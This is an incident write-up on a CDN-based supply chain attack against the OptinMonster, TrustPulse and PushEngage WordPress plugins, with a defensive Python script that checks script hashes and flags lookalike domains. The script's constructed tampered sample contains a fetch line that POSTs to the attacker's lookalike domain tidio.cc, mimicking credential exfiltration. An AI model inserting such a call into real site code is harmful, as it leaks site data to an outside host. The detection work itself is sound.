OptinMonster Supply Chain Attack — CDN Poisoning at Scale

What Happened

A supply chain attack against three popular WordPress marketing plugins — OptinMonster, TrustPulse, and PushEngage — served tampered JavaScript from their vendors’ CDNs to live websites. The injected code ran inside the browser of any logged-in administrator who loaded an affected page, and used that administrator’s own session to silently create hidden admin accounts and install a self-hiding backdoor plugin.

The Entry Point

Per OptinMonster’s disclosure, an attacker exploited a vulnerability in a third-party plugin (UpdraftPlus) running on OptinMonster’s marketing website to gain access to that server. From there they retrieved a CDN API key and used it to modify the JavaScript files served to customers from the CDN edge. No update was pushed to the plugins themselves — the change happened entirely at the CDN.

Scale of Impact

The campaign hit over 1.2 million sites. OptinMonster alone has over a million active WordPress installations, with TrustPulse and PushEngage adding many more. The payload fires only for logged-in administrators, but because the threat actor gains effective full control of each compromised site, further abuse aimed at regular visitors should be expected.

Attack Mechanics

The malware waits for a logged-in administrator, creates a backdoor admin account, and installs a self-hiding backdoor plugin. It then sends the new credentials to tidio.cc — a lookalike of the real tidio.com.

The C2 domain tidio.cc was registered on April 28, 2026, and a TLS certificate was issued for it — indicating the campaign was prepared well in advance. Malware was first observed in the OptinMonster and TrustPulse api.min.js files on June 12 at 22:17 UTC.
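Because the tampering happened at the CDN rather than in a plugin release, the useful defensive check is on the script content a site actually loads: compare it against a recorded known-good hash and flag any domain it references that is not expected, treating a domain that shares a name with an expected one but differs in TLD (tidio.cc versus tidio.com) as a lookalike. The script below is an added example, not code from the article or from OptinMonster; the baseline hash, the allowed-domain list and both script samples are constructed for illustration.

```python
import hashlib
import re

# Constructed stand-in for a known-good api.min.js, recorded when the CDN file
# was last verified clean (assumption: the operator keeps such a baseline).
KNOWN_GOOD_JS = "(function(){fetch('https://api.optinmonster.com/v1/campaigns');})();"
BASELINE_SHA256 = hashlib.sha256(KNOWN_GOOD_JS.encode()).hexdigest()

# Constructed tampered sample: same script plus a call to the lookalike domain.
TAMPERED_JS = KNOWN_GOOD_JS + "fetch('https://tidio.cc/collect',{method:'POST'});"

# Domains the legitimate script is expected to contact (assumed allowlist).
ALLOWED_DOMAINS = {"api.optinmonster.com", "tidio.com"}

# Hostname of any absolute http(s) URL embedded in the script text.
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def lookalike_of(domain, allowed):
    """Return the allowed domain whose second-level label matches `domain`
    but whose full name differs (e.g. tidio.cc -> tidio.com), else None."""
    label = domain.lower().split(".")[-2]
    for candidate in allowed:
        if candidate.split(".")[-2] == label and candidate != domain.lower():
            return candidate
    return None


def audit_script(js_text, baseline_sha256, allowed):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    digest = hashlib.sha256(js_text.encode()).hexdigest()
    if digest != baseline_sha256:
        findings.append(f"content changed: sha256 {digest[:12]}... differs from baseline")
    for dom in sorted({m.lower() for m in DOMAIN_RE.findall(js_text)}):
        if dom in allowed:
            continue
        twin = lookalike_of(dom, allowed)
        if twin:
            findings.append(f"lookalike domain {dom} (resembles allowed {twin})")
        else:
            findings.append(f"unexpected domain {dom}")
    return findings


if __name__ == "__main__":
    for name, js in (("known-good", KNOWN_GOOD_JS), ("tampered", TAMPERED_JS)):
        print(name, audit_script(js, BASELINE_SHA256, ALLOWED_DOMAINS) or ["clean"])
```

In practice the `js_text` would be the file fetched from the CDN edge on a schedule, so a content change is caught even when, as here, no plugin update was ever shipped.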

Timeline of Containment

OptinMonster and TrustPulse files were clean by June 13, while PushEngage’s script lingered on some CDN servers into June 14.

Broader Risk — Awesome Motive Portfolio

Awesome Motive runs one of the largest WordPress plugin portfolios in the world — WPForms (6M+ installs), MonsterInsights (~2M), All in One SEO (~3M). So far only OptinMonster, TrustPulse, and PushEngage code has been confirmed compromised — but anyone running any Awesome Motive plugin should stay alert.
